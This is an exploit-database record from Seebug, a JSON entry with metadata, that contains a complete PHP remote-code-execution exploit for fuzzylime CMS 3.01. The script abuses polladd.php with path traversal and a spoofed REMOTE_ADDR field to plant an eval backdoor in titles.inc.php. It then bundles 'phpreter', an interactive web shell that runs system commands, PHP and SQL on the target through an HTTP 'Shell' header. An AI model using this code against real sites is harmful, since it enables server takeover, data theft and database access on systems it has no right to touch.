Description
No description provided by source.
{"sourceData": "\n #!/usr/bin/php\r\n<?php\r\n##\r\n## Fuzzylime 3.01 Remote Code Execution\r\n## Credits: Inphex and real\r\n##\r\n## [C:\\]# php fuzzylime.php http://www.target.com/fuzzylime/\r\n## [target][cmd]# id\r\n## uid=63676(dswrealty) gid=888(vusers) groups=33(www-data)\r\n##\r\n\r\n$url = $argv[1];\r\n\r\nget($url.'code/polladd.php?poll=....//titles&log=1&_SERVER[REMOTE_ADDR]=' . urlencode('";print "-:-:-";eval(stripslashes($_SERVER[\\'HTTP_SHELL\\']));print "-:-:-"; ?>') );\r\n\r\n$shell = new phpreter($url.'code/polls/titles.inc.php', '-:-:-(.*)-:-:-', 'cmd', array(), false);\r\n\r\nfunction get($url)\r\n{\r\n\t$infos = parse_url($url);\r\n\t$host = $infos['host'];\r\n\t$port = isset($infos['port']) ? $infos['port'] : 80;\r\n\t\r\n\t$fp = fsockopen($host, $port, &$errno, &$errstr, 30);\r\n\t\r\n\t$req = "GET $url HTTP/1.1\\r\\n";\r\n\t$req .= "Host: $host\\r\\n";\r\n\t$req .= "User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.0; fr; rv:1.8.1.14) Gecko/20080404 Firefox/2.0.0.14\\r\\n";\r\n\t$req .= "Connection: close\\r\\n\\r\\n";\r\n\r\n\tfputs($fp,$req);\r\n\tfclose($fp);\r\n}\r\n\r\n/*\r\n * Copyright (c) real\r\n *\r\n * This program is free software; you can redistribute it and/or \r\n * modify it under the terms of the GNU General Public License \r\n * as published by the Free Software Foundation; either version 2 \r\n * of the License, or (at your option) any later version. \r\n * \r\n * This program is distributed in the hope that it will be useful, \r\n * but WITHOUT ANY WARRANTY; without even the implied warranty of \r\n * MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the \r\n * GNU General Public License for more details. \r\n * \r\n * You should have received a copy of the GNU General Public License \r\n * along with this program; if not, write to the Free Software \r\n * Foundation, Inc., 59 Temple Place - Suite 330, Boston, MA 02111-1307, USA.\r\n *\r\n * TITLE: PHPreter\r\n * AUTHOR: Charles "real" F. <charlesfol[at]hotmail.fr>\r\n * VERSION: 1.0\r\n * LICENSE: GNU General Public License\r\n *\r\n * This is a really simple class with permits to exec SQL, PHP or CMD\r\n * on a remote host using the HTTP "Shell" header.\r\n *\r\n *\r\n * Sample code:\r\n * [host][sql]# mode=cmd\r\n * [host][cmd]# id\r\n * uid=2176(u47170584) gid=600(ftpusers)\r\n * \r\n * [host][cmd]# mode=php\r\n * [host][php]# echo phpversion();\r\n * 4.4.8\r\n * [host][php]# mode=sql\r\n * [host][sql]# SELECT version(), user()\r\n * --------------------------------------------------\r\n * version() | 5.0.51a-log\r\n * user() | dbo225004932@74.208.16.148\r\n * --------------------------------------------------\r\n * \r\n * [host][sql]#\r\n *\r\n */\r\n\r\nclass phpreter\r\n{\r\n\tvar $url;\r\n\tvar $host;\r\n\tvar $port;\r\n\tvar $page;\r\n\t\r\n\tvar $mode;\r\n\t\r\n\tvar $ssql;\r\n\t\r\n\tvar $prompt;\r\n\tvar $phost;\r\n\t\r\n\tvar $regex;\r\n\tvar $data;\r\n\t\r\n\t/**\r\n\t * __construct()\r\n\t *\r\n\t * @param url The url of the remote shell.\r\n\t * @param regexp The regex to catch cmd result.\r\n\t * @param mode Mode: php, sql or cmd.\r\n\t * @param sql An array with the file to include,\r\n\t * and sql vars\r\n\t * @param clear Determines if clear() is called\r\n\t * on startup\r\n\t */\r\n\tfunction __construct($url, $regexp='^(.*)$', $mode='cmd', $sql=array(), $clear=true)\r\n\t{\r\n\t\t$this->url = $url;\r\n\t\t\r\n\t\t$this->regex = '#'.$regexp.'#is';\r\n\t\t\r\n\t\t#\r\n\t\t# Set data\r\n\t\t#\r\n\t\t\r\n\t\t$infos =\tparse_url($this->url);\r\n\t\t$this->host =\t$infos['host'];\r\n\t\t$this->port =\tisset($infos['port']) ? $infos['port'] : 80;\r\n\t\t$this->page =\t$infos['path'];\r\n\t\tunset($infos);\r\n\t\t\r\n\t\t# www.(site).com\r\n\t\t$host_tmp =\texplode('.',$this->host);\r\n\t\t$this->phost =\t$host_tmp[ count($host_tmp)-2 ];\r\n\t\tunset($host_tmp);\r\n\t\t\r\n\t\t#\r\n\t\t# Set up MySQL connection string\r\n\t\t#\r\n\t\tif(!sizeof($sql))\r\n\t\t\t$this->ssql = '';\r\n\t\telseif(sizeof($sql)==5)\r\n\t\t{\r\n\t\t\t$this->ssql = "include('$sql[0]');"\r\n\t\t\t . "mysql_connect($sql[1], $sql[2], $sql[3]);"\r\n\t\t\t\t . "mysql_select_db($sql[4]);";\r\n\t\t}\r\n\t\telse\r\n\t\t{\r\n\t\t\t$this->ssql = ""\r\n\t\t\t . "mysql_connect('$sql[0]', '$sql[1]', '$sql[2]');"\r\n\t\t\t\t . "mysql_select_db('$sql[3]');";\r\n\t\t}\r\n\t\t\r\n\t\t$this->setmode($mode);\r\n\t\t\r\n\t\t#\r\n\t\t# Main Loop\r\n\t\t#\r\n\r\n\t\tif($clear) $this->clear();\r\n\t\tprint $this->prompt;\r\n\r\n\t\twhile( !preg_match('#^(quit|exit|close)$#i', ($cmd = trim(fgets(STDIN)))) )\r\n\t\t{\r\n\t\t\t# change mode\r\n\t\t\tif(preg_match('#^(set )?mode(=| )(sql|cmd|php)$#i',$cmd,$array))\r\n\t\t\t\t$this->setmode($array[3]);\r\n\t\t\t\r\n\t\t\t# clear data\r\n\t\t\telseif(preg_match('#^clear$#i',$cmd))\r\n\t\t\t\t$this->clear();\r\n\t\t\t\r\n\t\t\t# else\r\n\t\t\telse print $this->exec($cmd);\r\n\t\t\t\r\n\t\t\tprint $this->prompt;\r\n\t\t}\r\n\t}\r\n\t\r\n\t/**\r\n\t * clear()\r\n\t * Just clears ouput, printing '\\n'x50\r\n\t */\r\n\tfunction clear()\r\n\t{\r\n\t\tprint str_repeat("\\n", 50);\r\n\t\treturn 0;\r\n\t}\r\n\t\r\n\t/**\r\n\t * setmode()\r\n\t * Set mode (PHP, CMD, SQL)\r\n\t * You don't have to call it.\r\n\t * use mode=[php|cmd|sql] instead,\r\n\t * in the prompt.\r\n\t */\r\n\tfunction setmode($newmode)\r\n\t{\r\n\t\t$this->mode = strtolower($newmode);\r\n\t\t$this->prompt = '['.$this->phost.']['.$this->mode.']# ';\r\n\t\t\r\n\t\tswitch($this->mode)\r\n\t\t{\r\n\t\t\tcase 'cmd':\r\n\t\t\t\t$this->data = 'system(\\'<CMD>\\');';\r\n\t\t\t\tbreak;\r\n\t\t\tcase 'php':\r\n\t\t\t\t$this->data = '';\r\n\t\t\t\tbreak;\r\n\t\t\tcase 'sql':\r\n\t\t\t\t$this->data = $this->ssql\r\n\t\t\t\t . '$q = mysql_query(\\'<CMD>\\') or print(str_repeat("-",50)."\\n".mysql_error()."\\n");'\r\n\t\t\t\t\t . 'print str_repeat("-",50)."\\n";'\r\n\t\t\t\t\t . 'while($r=mysql_fetch_array($q,MYSQL_ASSOC))'\r\n\t\t\t\t\t . '{'\r\n\t\t\t\t\t . \t'foreach($r as $k=>$v) print " ".$k.str_repeat(" ", (20-strlen($k)))."| $v\\n";'\r\n\t\t\t\t\t . \t'print str_repeat("-",50)."\\n";'\r\n\t\t\t\t\t . '}';\r\n\t\t\t\tbreak;\r\n\t\t}\r\n\t\treturn $this->mode;\r\n\t}\r\n\r\n\t/**\r\n\t * exec()\r\n\t * Execute any query and catch the result.\r\n\t * You don't have to call it.\r\n\t */\r\n\tfunction exec($cmd)\r\n\t{\r\n\t\tif(!strlen($this->data))\t$shell = $cmd;\r\n\t\telse \t$shell = str_replace('<CMD>', addslashes($cmd), $this->data);\r\n\t\t\r\n\t\t$fp = fsockopen($this->host, $this->port, &$errno, &$errstr, 30);\r\n\t\t\r\n\t\t$req = "GET " . $this->page . " HTTP/1.1\\r\\n";\r\n\t\t$req .= "Host: " . $this->host . ( $this->port!=80 ? ':'.$this->port : '' ) . "\\r\\n";\r\n\t\t$req .= "User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.0; fr; rv:1.8.1.14) Gecko/20080404 Firefox/2.0.0.14\\r\\n";\r\n\t\t$req .= "Shell: $shell\\r\\n";\r\n\t\t$req .= "Connection: close\\r\\n\\r\\n";\r\n\t\t\r\n\t\tunset($shell);\r\n\r\n\t\tfputs($fp, $req);\r\n\t\t\r\n\t\t$content = '';\r\n\t\twhile(!feof($fp)) $content .= fgets($fp, 128);\r\n\t\t\r\n\t\tfclose($fp);\r\n\t\t\r\n\t\t# Remove headers\r\n\t\t$data = explode("\\r\\n\\r\\n", $content);\r\n\t\t$headers = array_shift($data);\r\n\t\t$content = implode("\\r\\n\\r\\n", $data);\r\n\t\t\r\n\t\tif(preg_match("#Transfer-Encoding:.*chunked#i", $headers))\r\n\t\t\t$content = $this->unchunk($content);\r\n\t\r\n\t\tpreg_match($this->regex, $content, $data);\r\n\t\t\r\n\t\tif($data[1][ strlen($data)-1 ] != "\\n") $data[1] .= "\\n";\r\n\t\t\r\n\t\treturn $data[1];\r\n\t}\r\n\t\r\n\t/**\r\n\t * unchunk()\r\n\t * This function aims to remove chunked content sizes which\r\n\t * are putted by apache server when it uses chunked\r\n\t * transfert-encoding.\r\n\t */\r\n\tfunction unchunk($data)\r\n\t{\r\n\t\t$dsize = 1;\r\n\t\t$offset = 0;\r\n\t\t\r\n\t\twhile($dsize>0)\r\n\t\t{\r\n\t\t\t$hsize_size = strpos($data, "\\r\\n", $offset) - $offset;\r\n\t\t\t\r\n\t\t\t$dsize = hexdec(substr($data, $offset, $hsize_size));\r\n\t\t\t\r\n\t\t\t# Remove $hsize\\r\\n from $data\r\n\t\t\t$data = substr($data, 0, $offset) . substr($data, ($offset + $hsize_size + 2) );\r\n\t\t\t\r\n\t\t\t$offset += $dsize;\r\n\t\t\t\r\n\t\t\t# Remove the \\r\\n before the next $hsize\r\n\t\t\t$data = substr($data, 0, $offset) . substr($data, ($offset+2) );\r\n\t\t}\r\n\t\t\r\n\t\treturn $data;\r\n\t}\r\n}\r\n\r\n?>\n ", "status": "poc", "description": "No description provided by source.", "sourceHref": "https://www.seebug.org/vuldb/ssvid-9024", "reporter": "Root", "href": "https://www.seebug.org/vuldb/ssvid-9024", "type": "seebug", "viewCount": 5, "references": [], "lastseen": "2017-11-19T21:39:53", "published": "2008-07-13T00:00:00", "cvelist": [], "id": "SSV:9024", "enchantments_done": [], "modified": "2008-07-13T00:00:00", "title": "fuzzylime cms 3.01 (polladd.php poll) Remote Code Execution Exploit (php)", "cvss": {"score": 0.0, "vector": "NONE"}, "bulletinFamily": "exploit", "enchantments": {"score": {"value": 0.2, "vector": "NONE"}, "dependencies": {}, "backreferences": {}, "exploitation": null, "vulnersScore": 0.2}, "immutableFields": [], "cvss2": {}, "cvss3": {}, "_state": {"dependencies": 1645386368, "score": 1659785532}}
{}